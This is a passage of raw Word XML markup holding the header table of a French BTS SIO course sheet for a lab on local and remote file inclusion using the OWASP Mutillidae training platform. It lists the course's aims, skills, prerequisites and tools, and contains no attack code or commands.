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FF7D8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="titredocument"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Sécurisation des applications Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC4054A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre21"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Activité 6 : Inclusion de fichiers locaux et distants</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9235" w:type="dxa"/>
        <w:tblInd w:w="-17" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="60" w:type="dxa"/>
          <w:left w:w="60" w:type="dxa"/>
          <w:bottom w:w="60" w:type="dxa"/>
          <w:right w:w="60" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1868"/>
        <w:gridCol w:w="7367"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E2504F" w14:paraId="50BEE4CE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="6699CC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E0BD056" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Propriétés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="6699CC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16442EAA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="6B252007" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="465CA3C1" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Intitulé long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B02F2AF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exploitation d'une plateforme d'apprentissage des vulnérabilités des applications </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="0C41061D" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A4AA182" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Intitulé court</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C22C088" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sécurisation des applications </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="3EE1C93B" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35943ECF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Formation concernée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="133A4E7D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>BTS Services Informatiques aux Organisations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="1CCA97DF" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76F1C2A2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Matière</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33C4B7C4" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Bloc 3 : Cybersécurité des services informatiques en deuxième année SLAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="39433BA8" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23310C4C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Présentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2BB1819F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ce Côté labo a pour objectif d'exploiter la plateforme d'apprentissage Mutillidae du groupe </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP </w:t>
            </w:r>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>OpenWeb Application Security Project</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) afin de se familiariser avec les principales vulnérabilités des applications </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53C68B93" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Chaque activité couvre une problématique spécifique (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
            <w:r>
              <w:t>…) en référence au top 10 des vulnérabilités décrites par l'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>OWASP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E565F1" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Dans un premier temps, l'étudiant doit réaliser les attaques associées à chaque vulnérabilité.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3584725E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Dans un deuxième temps, l’objectif est d’analyser et de comprendre les codes sources des scripts présentés dans leur forme non sécurisée puis sécurisée en tant que contre-mesure.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3524533F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D9A7339" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cette sixième activité</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> concerne l’inclusion de fichiers locaux et distants. Cette faille arrive en 5ième position dans le classement </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>OWASP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 2017.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="030D2E5D" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63546FB9" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Compétences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="394F084A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Protéger les données à caractère personnel ;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27FDD0EE" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Identifier les risques liés à la collecte, au traitement, au stockage et à la diffusion de données à caractère personnel.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F451054" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Garantir la disponibilité, l’intégrité et la confidentialité des services informatiques et des données de l’organisation face à des cyberattaques.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27904680" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Caractériser les risques liés à l’utilisation malveillante d’un service informatique ;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64ED6A20" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Recenser les conséquences d’une perte de disponibilité, d’intégrité ou de confidentialité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="20924619" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2BB84602" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Savoirs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57627240" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Sécurité des applications web : risques, menaces et protocoles.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C5E294" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
            <w:pPr>
              <w:widowControl w:val="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="3CC36228" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2697EA27" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Prérequis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CFE8F12" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Commandes de base d’administration d’un système </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, langages </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>PHP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Dans </w:t>
            </w:r>
            <w:hyperlink r:id="rId7" w:tgtFrame="https://www.reseaucerta.org/securisation-des-applications-web-owasp-activite1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Lienhypertexte1"/>
                  <w:color w:val="000080"/>
                </w:rPr>
                <w:t>l’activité 1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t>, avoir lu la présentation (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>owasp-presentation-v1.1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) et réalisé les installations décrites dans le fichier </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>owasp-mise_en_place-v1.1</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="1908304C" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E997059" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Outils</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F77DBAD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Deux machines éventuellement virtualisées sont nécessaires avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> comme système d’exploitation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4433516A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FC739FA" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Sites officiels :</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:tgtFrame="https://www.owasp.org/">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Lienhypertexte1"/>
                  <w:color w:val="000080"/>
                </w:rPr>
                <w:t>https://www.owasp.org</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> et </w:t>
